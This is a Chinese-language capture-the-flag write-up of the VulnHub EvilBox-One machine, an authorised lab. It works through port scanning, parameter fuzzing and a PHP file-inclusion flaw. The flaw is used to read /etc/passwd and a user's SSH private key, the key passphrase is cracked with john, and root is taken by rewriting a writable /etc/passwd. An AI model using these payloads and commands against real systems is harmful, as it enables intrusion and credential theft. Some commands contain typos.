vulnhub打靶日记:接口和传参的信息收集技巧

目录

总结

边界突破

信息收集

主机发现

端口扫描,服务探测

web渗透

目录扫描

参数爆破

php封装器写入文件尝试

ssh爆破

内网渗透

提权

免费领取安全学习资料包!


靶机:https://download.vulnhub.com/evilbox/EvilBox---One.ova
攻击机:kali2022.2
目标:两个flag,root权限
没错,鸽了好久我又来了,主要这次在边界突破卡的有点久

总结

主机发现(新方法fping)
端口扫描、服务探测
路径爆破(用过的dirsearch,gobuster,个人感觉gobuster更快)
参数爆破(下载了新字典集seclists,新工具fuff)
web渗透(模糊测试文件包含漏洞,新知识php封装器)
ssh爆破(探测ssh认证方式,ssh公私钥默认位置,新工具john)
提权(新知识find搜索suid权限文件,搜索可写权限的文件)
想了想把总结写到前面,这样小伙伴们可以看看有没有感兴趣的知识,之前放到最后感觉看到最后的人很少哇

边界突破

信息收集

主机发现

fping -gaq 10.0.3.0/24

图片


靶机ip:10.0.3.11

端口扫描,服务探测

nmap -p- 10.0.3.11
nmap -p22,80 -A 10.0.3.11

图片


22:ssh (ssh暴力破解)
80:apache
linux4.15-5.6

web渗透

图片


根目录动不了手脚

目录扫描

gobuster dir -u htttp://10.0.3.11 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
发现/secret,/index.html

图片


空白页面,查看源码也是空白,继续扫描
gobuster dir -u htttp://10.0.3.11/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
发现/evil.php

图片


依旧空空如也,可能是只有目录没有参数。

参数爆破
 
  1. ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w value.txt:VAL -u http://10.0.3.11/secret/evil.php?PARAM=VAL -fs 0

-w指定字典,第一个是PARAM参数的意思,字典来自burp的专业版,kali可以通过apt-get install seclists来下载seclists里面有很多的字典可用
第二个字典是参数的值,value.txt是我自己写的,在前面的打靶里说过,可以把键盘上所有能敲的字符做一个字典,来尝试让页面报错。-fs 0 是过滤掉回显空白的页面。
当然小伙伴们也可以用burp的爆破模块来做。

图片


并没有发现。试试有没有文件包含漏洞,让字典里的所有参数的值等于一个确定已经有的文件。前面发现了index.php是确定有的。
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.0.3.11/secret/evil.php?FUZZ=../index.html -fs 0
发现command参数可用。

图片


确认漏洞
?command=../../../../../../../etc/passwd/
先跳出到根目录,在访问/etc/passwd

图片


注意这个一看就不像是程序账户的用户mowree,后面要用
确认了有文件包含和任意文件读取漏洞。然后我写了一句话尝试了远程包含失败了,应该是只能本地包含。

php封装器写入文件尝试

?command=php://filter/convert.base64-encode/resource=evil.php
可以读取evil.php的源码然后通过base64加密返回。

图片


解码

<?php

$filename = $_GET['command'];

include($filename);

?>

如果不声明的话filter封装器默认是用read,也可以用wirte写入文件。只要有写入权限就webshell了。
?command=php://filter/write=convert.base64-decode/resource=test.php&txt=c2hhbnF1ZQo=

图片


ssh爆破

先探测ssh登陆的认证过程
ssh mowree@10.0.3.11 -v

图片


支持ssh公钥登陆。思路明确了,用文件包含去读取默认的ssh公私钥。
?command=../../../../../home/mowree/.ssh/authorized_keys

图片


?command=../../../../../home/mowree/.ssh/id_rsa
在源码中查看私钥会比较友好,不然页面上真是乱的。。。。

图片

创建id_rsa,把获取到的私钥丢进去,给权限。ssh 对目录的权限有要求,代码中要设置下新生成的config文件权限才行。
~目录权限是750,~/.ssh 的是700, ~/.ssh/* 的是600,~/.ssh/config 是700​​​​​​​

vi id_rsa

chmod 600 id_rsa

ssh mowree@10.0.3.11 -i id_rsa

图片


私钥文件还有一个密码,我tm直接好家伙。
爆破密码
用到kali自带工具john,先要转换私钥的格式才能用这个工具爆破​​​​​​​

cd /usr/share/john

ls ssh2john.py

./ssh2john.py ~/id_rsa > ~/hash

john hash --wordlist=rockyou.txt

图片


私钥文件的加密密码为unicorn

图片


至此成功突破边界。

内网渗透

图片


第一个flag:56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

提权

sudo -l,内核漏洞,计划任务提权失败后,尝试suid提权
搜索具有suid权限位的文件
find / -perm /4000 2>dev/null

图片


并没有漏洞发现。

查看有没有自己写的有root权限的脚本,我们可以去编辑的
find / -writable 2>/dev/null

图片


居多/proc的,这是个内存映像目录,没用,把它过滤掉
find / -wirtable 2>/dev/null | grep -v proc

图片


???这不给tmROOT密码改了
生成一个密码shanque
openssl passwd -l

图片


把生成的密文贴到/etc/passwd里面,把root后面的代表密码的x删了。

图片


flag2:36QtXfdJWvdC0VavlPIApUbDlqTsBM

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值